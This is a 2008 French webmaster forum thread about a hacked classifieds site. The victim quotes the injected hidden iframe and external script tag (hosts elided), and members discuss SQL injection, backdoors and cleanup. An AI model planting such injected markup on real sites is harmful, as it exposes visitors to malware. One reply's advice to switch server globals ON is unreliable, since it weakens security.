Formation par Olivier Duffez

Formation au référencement par Olivier Duffez, créateur de WebRankInfo !
Une formule efficace alliant théorie et pratique, avec une haute disponibilité des intervenants
Cette formule a déjà convaincu plusieurs centaines d'entreprises, pourquoi pas vous ?
Réservez vite votre place en ligne (convention possible pour imputer sur le budget formation)

Formation référencement Marseille

Site piraté

Poster un nouveau sujet Imprimer cette discussion    Forum -> Développement d'un site Web   Les dernières discussions de ce forum sont disponibles au format RSS
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message

lechtimi
WRInaute discret
WRInaute discret

URL permanente de ce messagePosté le : Ven Avr 11, 2008 10:34    Sujet du message: Site piraté

Bonjour
Voilà j’ai mon site de petites annonces qui est piraté depuis une semaine (je n’ais pas fait de mise à jour du script et maintenant je ne peux plus en faire car certaines parties du site on changées, je dis cela pour les personnes qui utilisent ce script). Bref, le hacker arrive jusque .../admin/config/templates_news/ et il met sur template.tpl cette ligne (<div id="stats" style="visibility:hidden;" width='1' height='1'><iframe src ="http://www......com" frameborder='0' height='1' width='1'></iframe></div> <script type="text/javascript" src="http://...."></script>) qui a pour but de faire une redirection sur un autre site.
Donc j’aurais quelques questions :
- est ce normal que l’on puisse arrivé à .../admin/config/templates_news/ aussi facilement, si non comment faire pour remédier à cela
- Comment le gars à pus insérer cette ligne dans template.tpl, j’ais lu dans certain site que c’est une injection SQL ? Si c’est une injection, par où est il obligé de passé (login, enregistrement…ou une autre entrée)
Merci

lechtimi Visiter le site web du posteur
Bacteries
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Ven Avr 11, 2008 10:45    Sujet du message: Site piraté

Si c'est une injection SQL c'est normalement via un formulaire.

Après tout dépend ce qu'il a obtenu comme info ou ceux à quoi ila accès.
Mais si une injection permet de mettre du code PHP, on peut imaginer qu'il a mis du code qui va modifier un fichier tpl.

Bacteries Visiter le site web du posteur
lechtimi
WRInaute discret
WRInaute discret

URL permanente de ce messagePosté le : Ven Avr 11, 2008 10:56    Sujet du message: Site piraté

Donc si je retire tous les formulaires (login, enregistrement, ect..) il ne peut plus rien faire ? Je demande cela car je refais un nouveau répertoire petites annonces (avec le derniere mise à jour) mais je ne voudrais pas perdre toutes les anciennes annonces

Jeviensderio
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Ven Avr 11, 2008 12:19    Sujet du message: Site piraté

Changer les scripts, effacer tous les fichiers PHP sur le serveur, et changer les codes d'accès pour plus de précautions. Et voir le contenu de la base. Un peu de distraction en perspective.

Jeviensderio Visiter le site web du posteur
Bool
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Ven Avr 11, 2008 12:19    Sujet du message: Site piraté

Les injections SQL au contraire sont souvent "faisables" sur la quasi totalité des pages utilisant des entrées utilisateurs ($_GET, $_POST, $_COOKIE, voir même certaines variables $_SERVER).

Mais une injection SQL permet d'exécuter du SQL... pas d'exécuter du PHP. Du moins pas directement.

Le soucis c'est qu'une fois que le pirate a eu l'accès, il a très probablement tes logins et mot de passe SQL... qui sont souvent les mêmes que le FTP (c'est con, mais c'est comme ça chez la plupart des hébergeurs). De même, il a parfaitement eu le temps d'installer une "backdoor" afin de récupérer l'accès même si tu changes les mots de passe...

Bool Visiter le site web du posteur
Leonick
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Ven Avr 11, 2008 19:40    Sujet du message: Site piraté

Jeviensderio a écrit:
Changer les scripts, effacer tous les fichiers PHP sur le serveur
je sauvegarderais tous les fichiers distants, avant de les effacer. Car il faut voir ce qui a été modifié et sécuriser pour que ça n'arrive plus
Bool a écrit:
Mais une injection SQL permet d'exécuter du SQL... pas d'exécuter du PHP. Du moins pas directement.
en fait, un formulaire mal sécurisé, si tu lui tapes du code php et qu'à l'affichage il n'est pas non plus sécurisé, tu te retrouve à faire exécuter du php Crying or Very sad

Leonick Visiter le site web du posteur
KOogar
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Ven Avr 11, 2008 22:29    Sujet du message: Site piraté

Ferme tous tes fichiers .tpl en écriture, puis si tu peux, passe les globals de ton serveur a ON.
Evite les scripts open source si c'est ton cas, trop de cheats, surtout dans les annonces. C'est peut etre un concurrent qui exploite une faille du script... pas besoin d'avoir les acces -ftp pour lancer un script foireux, lui ajouter 1 variable et mettre a jour ton .tpl...

KOogar Visiter le site web du posteur
Bool
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Sam Avr 12, 2008 2:34    Sujet du message: Site piraté

Leonick a écrit:
en fait, un formulaire mal sécurisé, si tu lui tapes du code php et qu'à l'affichage il n'est pas non plus sécurisé, tu te retrouve à faire exécuter du php Crying or Very sad

yep, mais ça n'a rien à voir avec une injection SQL pour le coup Rolling Eyes

lechtimi
WRInaute discret
WRInaute discret

URL permanente de ce messagePosté le : Sam Avr 12, 2008 4:25    Sujet du message: Site piraté

Salut
Merci de vos réponse mais dur pour moi Sad
Soit pour l'instant je vais essayer de retirer toutes les pages à inscription(login,member....)
Comment voir si il a mit une "backdoor"

Dan_A
WRInaute occasionnel
WRInaute occasionnel

URL permanente de ce messagePosté le : Sam Avr 12, 2008 8:31    Sujet du message: Site piraté

Ce problème n'a sans doute rien à voir avec une injection SQL.
Dans ma base de données sur les failles connues de CMS, il y a à ce jour 195 failles exploitées par des zombies au niveau du répertoire admin et ses sous répertoires.
Le mieux, c'est de récupérer ce qui peut l'être, tout effacer et mettre à jour régulièrement son CMS en priant pour ne pas victime d'un zero-day exploit.
Le gros problème c'est que ces zombies placent du code qui risque d'infecter les visiteurs afin d'étendre le botnet.

Dan_A
Leonick
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Sam Avr 12, 2008 10:04    Sujet du message: Site piraté

Bool a écrit:
Leonick a écrit:

pour modifier du contenu de scripts, c'est bien autre chose que de la simple injection SQL

Leonick Visiter le site web du posteur
KOogar
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Sam Avr 12, 2008 11:27    Sujet du message: Site piraté

Leonick a écrit:
Bool a écrit:
Leonick a écrit:

pour modifier du contenu de scripts, c'est bien autre chose que de la simple injection SQL

Eventuellement tu pourrais injecter du code qui modifie 1 fichier .tpl mais dans son cas c'est encore plus simple. Les programmeurs utilisent souvent des sous routines dans des fichiers a part et ils sont non protégés par des sessions. Tant que personne n'a le source, on s'en fou, mais quand le source est public il y a danger.

KOogar Visiter le site web du posteur
Bool
WRInaute accro
WRInaute accro

URL permanente de ce messagePosté le : Sam Avr 12, 2008 17:38    Sujet du message: Site piraté

Leonick a écrit:

Dialogue de sourds... c'est justement ce que je dis depuis le début : ceci n'a rien à voir avec une injection SQL, contrairement à ce qui est évoqué dans les premiers posts.

Revenir en haut    Forum -> Développement d'un site Web Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1 - 
Connexion
Nom d'utilisateur:    Mot de passe:      Se connecter automatiquement à chaque visite    

CLIQUEZ ICI pour vous inscrire à WebRankInfo (forum, annuaire, outils...)

Connexion

© 2001-2005 phpBB Group, support français
Personnalisation : WebRankInfo ™

ODP  Firefox  Alsacreations  annuaire webmaster Yagoort